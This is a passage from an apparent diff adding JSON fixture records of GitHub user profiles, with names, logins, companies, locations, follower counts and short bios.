127, + "created_at": "2014-04-14T15:38:13Z", + "updated_at": "2024-09-04T07:21:28Z", + "node_id": "MDQ6VXNlcjcyOTIwMDI=", + "bio": "developer @ IBM Quantum\r\n", + "is_hireable": false, + "twitter_username": "planetf1" + } +}, +{ + "model": "github.user", + "pk": 1898, + "fields": { + "nest_created_at": "2024-09-12T00:29:56.186Z", + "nest_updated_at": "2024-09-22T19:26:54.528Z", + "name": "Philippus Baalman", + "login": "Philippus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1923596?v=4", + "company": "@wehkamp formerly @trimm", + "location": "", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 50, + "public_gists_count": 9, + "public_repositories_count": 241, + "created_at": "2012-07-04T20:56:41Z", + "updated_at": "2024-08-27T13:37:53Z", + "node_id": "MDQ6VXNlcjE5MjM1OTY=", + "bio": "You had me at λ.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1899, + "fields": { + "nest_created_at": "2024-09-12T00:29:57.766Z", + "nest_updated_at": "2024-09-12T00:29:57.766Z", + "name": "Oliver Wagner", + "login": "nauni77", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39400842?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2018-05-18T07:42:37Z", + "updated_at": "2024-08-27T20:47:02Z", + "node_id": "MDQ6VXNlcjM5NDAwODQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1900, + "fields": { + "nest_created_at": "2024-09-12T00:29:58.995Z", + "nest_updated_at": "2024-09-12T00:30:00.203Z", + "name": "", + "login": "tongd2020", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78407555?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-02-02T07:46:09Z", + "updated_at": "2021-02-02T08:12:06Z", + "node_id": "MDQ6VXNlcjc4NDA3NTU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1901, + "fields": { + "nest_created_at": "2024-09-12T00:30:01.414Z", + "nest_updated_at": "2024-09-12T00:30:01.414Z", + "name": "", + "login": "arunkumarthangavel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101252722?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-03-09T09:37:27Z", + "updated_at": "2024-01-10T14:19:15Z", + "node_id": "U_kgDOBgj-cg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1902, + "fields": { + "nest_created_at": "2024-09-12T00:30:03.509Z", + "nest_updated_at": "2024-09-12T00:30:03.509Z", + "name": "Paulo Correia", + "login": "pacorreia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54323159?v=4", + "company": "", + "location": "Portugal", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 6, + "public_repositories_count": 8, + "created_at": "2019-08-20T15:14:42Z", + "updated_at": "2024-08-22T14:35:05Z", + "node_id": "MDQ6VXNlcjU0MzIzMTU5", + "bio": "I'm a generalist with particular skills on data and platform/systems domain.\r\n\r\nLike to automate as much as possible, and help others do more with less.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1903, + "fields": { + "nest_created_at": "2024-09-12T00:30:04.785Z", + "nest_updated_at": "2024-09-12T00:30:04.785Z", + "name": "", + "login": "AadiN17", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86644196?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-06-29T04:43:09Z", + "updated_at": "2023-06-07T06:29:33Z", + "node_id": "MDQ6VXNlcjg2NjQ0MTk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1904, + "fields": { + "nest_created_at": "2024-09-12T00:30:06.034Z", + "nest_updated_at": "2024-09-12T00:30:06.034Z", + "name": "", + "login": "pedrovilasboas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77747407?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-01-20T18:02:10Z", + "updated_at": "2024-07-22T08:20:59Z", + "node_id": "MDQ6VXNlcjc3NzQ3NDA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1905, + "fields": { + "nest_created_at": "2024-09-12T00:30:07.625Z", + "nest_updated_at": "2024-09-12T00:30:07.625Z", + "name": "Monika", + "login": "beMonika", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/125826844?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-02-19T19:03:27Z", + "updated_at": "2023-09-27T10:40:40Z", + "node_id": "U_kgDOB3_3HA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1906, + "fields": { + "nest_created_at": "2024-09-12T00:30:10.472Z", + "nest_updated_at": "2024-09-12T00:30:10.473Z", + "name": "Vindhya Hegde", + "login": "vindhyahegde31", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113421418?v=4", + "company": "Appian Corporation", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-09-13T07:28:47Z", + "updated_at": "2024-05-21T12:31:11Z", + "node_id": "U_kgDOBsKsag", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1907, + "fields": { + "nest_created_at": "2024-09-12T00:30:12.103Z", + "nest_updated_at": "2024-09-12T00:33:15.551Z", + "name": "", + "login": "sergeykad", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12783618?v=4", + "company": "", + "location": "Earth", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2015-06-07T10:50:53Z", + "updated_at": "2024-02-04T20:01:45Z", + "node_id": "MDQ6VXNlcjEyNzgzNjE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1908, + "fields": { + "nest_created_at": "2024-09-12T00:30:14.550Z", + "nest_updated_at": "2024-09-12T00:30:14.550Z", + "name": "", + "login": "Dhanxy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107783562?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-19T04:40:23Z", + "updated_at": "2023-11-29T20:07:09Z", + "node_id": "U_kgDOBmylig", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1909, + "fields": { + "nest_created_at": "2024-09-12T00:30:15.768Z", + "nest_updated_at": "2024-09-12T02:40:12.581Z", + "name": "", + "login": "Lingom-KSR", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84766127?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2021-05-25T06:52:38Z", + "updated_at": "2024-06-18T10:45:37Z", + "node_id": "MDQ6VXNlcjg0NzY2MTI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1910, + "fields": { + "nest_created_at": "2024-09-12T00:30:16.950Z", + "nest_updated_at": "2024-09-12T00:30:16.950Z", + "name": "Göran Löwkrantz", + "login": "lastcmaster", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5843038?v=4", + "company": "isMobile AB", + "location": "Luleå, Sweden", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2013-11-03T11:13:12Z", + "updated_at": "2024-03-08T10:14:02Z", + "node_id": "MDQ6VXNlcjU4NDMwMzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1911, + "fields": { + "nest_created_at": "2024-09-12T00:30:18.182Z", + "nest_updated_at": "2024-09-12T00:30:18.182Z", + "name": "Adam Płaczek", + "login": "brudnyhenry", + "email": "adam.placzek@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16334927?v=4", + "company": "", + "location": "Wroclaw", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 25, + "created_at": "2015-12-17T10:13:20Z", + "updated_at": "2024-08-14T08:51:37Z", + "node_id": "MDQ6VXNlcjE2MzM0OTI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1912, + "fields": { + "nest_created_at": "2024-09-12T00:30:19.432Z", + "nest_updated_at": "2024-09-12T00:30:19.432Z", + "name": "", + "login": "groboclown", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6464033?v=4", + "company": "", + "location": "Austin, TX, USA", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 9, + "public_gists_count": 7, + "public_repositories_count": 52, + "created_at": "2014-01-21T19:39:31Z", + "updated_at": "2024-08-29T13:13:40Z", + "node_id": "MDQ6VXNlcjY0NjQwMzM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1913, + "fields": { + "nest_created_at": "2024-09-12T00:30:20.680Z", + "nest_updated_at": "2024-09-12T00:30:20.680Z", + "name": "Megha Singhal", + "login": "meghasinghal1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13881466?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-08-20T05:20:01Z", + "updated_at": "2023-10-08T15:24:41Z", + "node_id": "MDQ6VXNlcjEzODgxNDY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1914, + "fields": { + "nest_created_at": "2024-09-12T00:30:22.301Z", + "nest_updated_at": "2024-09-12T00:30:22.301Z", + "name": "Himanshu Kumar", + "login": "himanshukumar4642", + "email": "himanshukumar4642@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/56557192?v=4", + "company": "NIT Kurukshetra", + "location": "jaipur,Rajasthan,India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2019-10-14T17:08:10Z", + "updated_at": "2023-10-25T06:16:57Z", + "node_id": "MDQ6VXNlcjU2NTU3MTky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1915, + "fields": { + "nest_created_at": "2024-09-12T00:30:23.605Z", + "nest_updated_at": "2024-09-12T00:30:23.605Z", + "name": "Jack Pickford", + "login": "pickfoj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44842019?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-11-07T14:50:31Z", + "updated_at": "2024-08-20T10:21:00Z", + "node_id": "MDQ6VXNlcjQ0ODQyMDE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1916, + "fields": { + "nest_created_at": "2024-09-12T00:30:24.819Z", + "nest_updated_at": "2024-09-12T00:30:24.819Z", + "name": "Joaquín Alvarez", + "login": "joaquinalvarezdev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40568359?v=4", + "company": "", + "location": "Argentina", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2018-06-25T12:33:08Z", + "updated_at": "2024-08-15T19:46:17Z", + "node_id": "MDQ6VXNlcjQwNTY4MzU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1917, + "fields": { + "nest_created_at": "2024-09-12T00:30:26.073Z", + "nest_updated_at": "2024-09-12T00:30:26.073Z", + "name": "", + "login": "zubata", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50323296?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2019-05-06T10:36:13Z", + "updated_at": "2024-08-18T20:14:59Z", + "node_id": "MDQ6VXNlcjUwMzIzMjk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1918, + "fields": { + "nest_created_at": "2024-09-12T00:30:27.652Z", + "nest_updated_at": "2024-09-12T00:30:45.572Z", + "name": "David Hoffer", + "login": "dhoffer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1568943?v=4", + "company": "", + "location": "Colorado Springs, CO", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2012-03-23T17:36:49Z", + "updated_at": "2024-08-18T16:13:35Z", + "node_id": "MDQ6VXNlcjE1Njg5NDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1919, + "fields": { + "nest_created_at": "2024-09-12T00:30:28.859Z", + "nest_updated_at": "2024-09-12T00:30:28.859Z", + "name": "", + "login": "GitMarco", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/340814?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2010-07-22T13:06:00Z", + "updated_at": "2024-09-10T14:05:09Z", + "node_id": "MDQ6VXNlcjM0MDgxNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1920, + "fields": { + "nest_created_at": "2024-09-12T00:30:31.425Z", + "nest_updated_at": "2024-09-12T00:30:31.425Z", + "name": "Leander", + "login": "Leander250", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19950310?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-06-15T10:46:39Z", + "updated_at": "2024-08-11T22:40:49Z", + "node_id": "MDQ6VXNlcjE5OTUwMzEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1921, + "fields": { + "nest_created_at": "2024-09-12T00:30:32.630Z", + "nest_updated_at": "2024-09-12T00:30:32.630Z", + "name": "Henry", + "login": "profhenry", + "email": "github@profhenry.de", + "avatar_url": "https://avatars.githubusercontent.com/u/4500024?v=4", + "company": "@GEBIT", + "location": "Düsseldorf, Germany", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-05-22T13:56:04Z", + "updated_at": "2024-08-04T10:15:04Z", + "node_id": "MDQ6VXNlcjQ1MDAwMjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1922, + "fields": { + "nest_created_at": "2024-09-12T00:30:33.802Z", + "nest_updated_at": "2024-09-12T00:30:33.802Z", + "name": "Alexandr", + "login": "myzonjkee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18481498?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-04-15T09:55:44Z", + "updated_at": "2024-08-07T08:05:45Z", + "node_id": "MDQ6VXNlcjE4NDgxNDk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1923, + "fields": { + "nest_created_at": "2024-09-12T00:30:36.259Z", + "nest_updated_at": "2024-09-12T00:30:36.259Z", + "name": "", + "login": "jsc57x", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11822263?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-04-06T18:12:04Z", + "updated_at": "2024-08-07T13:43:44Z", + "node_id": "MDQ6VXNlcjExODIyMjYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1924, + "fields": { + "nest_created_at": "2024-09-12T00:30:39.995Z", + "nest_updated_at": "2024-09-22T20:22:57.608Z", + "name": "Junglist", + "login": "BaronSam3di", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21068499?v=4", + "company": "MegaCorp", + "location": "Afghanistan of course!", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2016-08-16T21:32:40Z", + "updated_at": "2024-09-11T10:01:37Z", + "node_id": "MDQ6VXNlcjIxMDY4NDk5", + "bio": "Security Tester at a MEGACORP with and Msc Data Science", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1925, + "fields": { + "nest_created_at": "2024-09-12T00:30:41.643Z", + "nest_updated_at": "2024-09-12T00:30:41.643Z", + "name": "Travis Truttschel", + "login": "Flash619", + "email": "travis@truttschel.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1608113?v=4", + "company": "", + "location": "WI, USA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2012-04-03T12:40:50Z", + "updated_at": "2024-08-21T14:20:42Z", + "node_id": "MDQ6VXNlcjE2MDgxMTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1926, + "fields": { + "nest_created_at": "2024-09-12T00:30:43.081Z", + "nest_updated_at": "2024-09-12T00:30:43.081Z", + "name": "Jens Lidestrom", + "login": "jensli", + "email": "jens@lidestrom.se", + "avatar_url": "https://avatars.githubusercontent.com/u/123957?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2009-09-06T23:04:12Z", + "updated_at": "2024-07-11T15:02:23Z", + "node_id": "MDQ6VXNlcjEyMzk1Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1927, + "fields": { + "nest_created_at": "2024-09-12T00:30:44.326Z", + "nest_updated_at": "2024-09-12T00:30:44.326Z", + "name": "", + "login": "Yozhika", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88938895?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-08-14T15:17:42Z", + "updated_at": "2023-10-01T21:05:39Z", + "node_id": "MDQ6VXNlcjg4OTM4ODk1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1928, + "fields": { + "nest_created_at": "2024-09-12T00:30:46.771Z", + "nest_updated_at": "2024-09-12T00:33:04.605Z", + "name": "", + "login": "RobSHK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83770776?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2021-05-06T13:52:56Z", + "updated_at": "2024-07-02T13:29:26Z", + "node_id": "MDQ6VXNlcjgzNzcwNzc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1929, + "fields": { + "nest_created_at": "2024-09-12T00:30:47.580Z", + "nest_updated_at": "2024-09-12T00:30:47.580Z", + "name": "Anton Khruschceff", + "login": "ISINSHINO", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18241825?v=4", + "company": "", + "location": "Taganrog, Russia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-04-03T08:16:25Z", + "updated_at": "2024-06-17T14:04:57Z", + "node_id": "MDQ6VXNlcjE4MjQxODI1", + "bio": "software engineering", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1930, + "fields": { + "nest_created_at": "2024-09-12T00:30:48.768Z", + "nest_updated_at": "2024-09-12T00:30:48.768Z", + "name": "Manikanda prabu", + "login": "maniprabu101993", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23401764?v=4", + "company": "", + "location": "Chennai", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-11-11T13:29:54Z", + "updated_at": "2023-09-18T03:54:31Z", + "node_id": "MDQ6VXNlcjIzNDAxNzY0", + "bio": "Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1931, + "fields": { + "nest_created_at": "2024-09-12T00:30:50.787Z", + "nest_updated_at": "2024-09-12T00:30:50.787Z", + "name": "Ralph Wright", + "login": "ralph-wright", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12157437?v=4", + "company": "Onyx Point", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2015-04-28T17:25:39Z", + "updated_at": "2021-10-14T02:21:19Z", + "node_id": "MDQ6VXNlcjEyMTU3NDM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1932, + "fields": { + "nest_created_at": "2024-09-12T00:30:52.055Z", + "nest_updated_at": "2024-09-22T18:47:03.755Z", + "name": "Roman Wolf", + "login": "r4fterman", + "email": "r4fterman@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3824734?v=4", + "company": "Virtimo", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2013-03-10T16:29:24Z", + "updated_at": "2024-09-12T07:57:08Z", + "node_id": "MDQ6VXNlcjM4MjQ3MzQ=", + "bio": "Software Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1933, + "fields": { + "nest_created_at": "2024-09-12T00:30:53.259Z", + "nest_updated_at": "2024-09-12T00:31:58.285Z", + "name": "rochish", + "login": "rochish-suresh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/127931023?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-03-15T07:36:30Z", + "updated_at": "2024-04-26T08:09:35Z", + "node_id": "U_kgDOB6ASjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1934, + "fields": { + "nest_created_at": "2024-09-12T00:30:54.903Z", + "nest_updated_at": "2024-09-12T00:30:54.903Z", + "name": "Michal Szelag", + "login": "michalszelagsonos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52934505?v=4", + "company": "Sonos", + "location": "Boston", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-07-15T19:23:36Z", + "updated_at": "2024-09-03T19:15:35Z", + "node_id": "MDQ6VXNlcjUyOTM0NTA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1935, + "fields": { + "nest_created_at": "2024-09-12T00:30:56.119Z", + "nest_updated_at": "2024-09-12T00:31:59.510Z", + "name": "Peter Teichner", + "login": "ptecihner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92022180?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-10-06T09:16:41Z", + "updated_at": "2024-09-06T21:23:27Z", + "node_id": "U_kgDOBXwlpA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1936, + "fields": { + "nest_created_at": "2024-09-12T00:30:58.693Z", + "nest_updated_at": "2024-09-12T00:30:58.693Z", + "name": "Jan Meiswinkel", + "login": "meiswjn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41284403?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 28, + "created_at": "2018-07-16T07:58:57Z", + "updated_at": "2024-08-20T08:57:15Z", + "node_id": "MDQ6VXNlcjQxMjg0NDAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1937, + "fields": { + "nest_created_at": "2024-09-12T00:30:59.941Z", + "nest_updated_at": "2024-09-12T00:30:59.941Z", + "name": "Matheos Mattsson", + "login": "Matheos96", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32064310?v=4", + "company": "@Siemens", + "location": "Finland", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2017-09-18T12:16:24Z", + "updated_at": "2024-09-11T18:56:41Z", + "node_id": "MDQ6VXNlcjMyMDY0MzEw", + "bio": "Software Developer at Siemens Digital Industries Software", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1938, + "fields": { + "nest_created_at": "2024-09-12T00:31:01.166Z", + "nest_updated_at": "2024-09-12T00:31:01.166Z", + "name": "", + "login": "agrawalsmart7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39085884?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 31, + "public_gists_count": 2, + "public_repositories_count": 30, + "created_at": "2018-05-08T10:16:33Z", + "updated_at": "2024-08-11T17:21:49Z", + "node_id": "MDQ6VXNlcjM5MDg1ODg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1939, + "fields": { + "nest_created_at": "2024-09-12T00:31:02.629Z", + "nest_updated_at": "2024-09-12T00:31:02.629Z", + "name": "Kai Helbig", + "login": "ostrya", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23086761?v=4", + "company": "@TNG ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-10-26T21:35:00Z", + "updated_at": "2024-08-10T09:38:32Z", + "node_id": "MDQ6VXNlcjIzMDg2NzYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1940, + "fields": { + "nest_created_at": "2024-09-12T00:31:05Z", + "nest_updated_at": "2024-09-12T00:31:05Z", + "name": "Andreas Mohrig", + "login": "amohrig-kn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41284468?v=4", + "company": "Kühne + Nagel (AG & Co.) KG", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-07-16T08:00:25Z", + "updated_at": "2023-06-20T07:13:36Z", + "node_id": "MDQ6VXNlcjQxMjg0NDY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1941, + "fields": { + "nest_created_at": "2024-09-12T00:31:06.221Z", + "nest_updated_at": "2024-09-12T00:34:58.013Z", + "name": "", + "login": "yahia20456", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73944085?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-11-04T12:27:45Z", + "updated_at": "2024-07-23T12:41:23Z", + "node_id": "MDQ6VXNlcjczOTQ0MDg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1942, + "fields": { + "nest_created_at": "2024-09-12T00:31:07.439Z", + "nest_updated_at": "2024-09-12T00:31:07.439Z", + "name": "Swapnil Singh", + "login": "SwapnilSinghs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42491806?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2018-08-18T10:42:22Z", + "updated_at": "2024-05-22T08:19:48Z", + "node_id": "MDQ6VXNlcjQyNDkxODA2", + "bio": "Software Engineer | Programming Enthusiast | Love To Code\r\n\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1943, + "fields": { + "nest_created_at": "2024-09-12T00:31:08.662Z", + "nest_updated_at": "2024-09-12T00:31:08.662Z", + "name": "Jeffrey van Norden", + "login": "vandernorth", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5212402?v=4", + "company": "", + "location": "Haarlem, Netherlands", + "collaborators_count": 0, + "following_count": 